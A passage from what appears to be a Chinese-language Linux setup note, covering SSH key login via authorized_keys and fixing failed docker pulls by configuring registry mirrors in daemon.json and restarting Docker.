  4. linux执行:ssh-keygen -t rsa 生成.ssh文件夹 -> touch authorized_keys 新建文件(用户文件夹内,即/home/用户/.ssh)
  5. 将本地的密钥复制到authorized_keys文件里

docker pull失败

  1. 添加镜像
1
2
3
4
5
6
7
8
sudo tee /etc/docker/daemon.json <<-'EOF'
{
    "registry-mirrors" : [
    "https://docker.mirrors.ustc.edu.cn",
    "https://yxzrazem.mirror.aliyuncs.com",
    "http://hub-mirror.c.163.com"]
}
EOF
  1. 重启守护进程
1
sudo systemctl daemon-reload
  1. 重启服务
1
sudo systemctl restart docker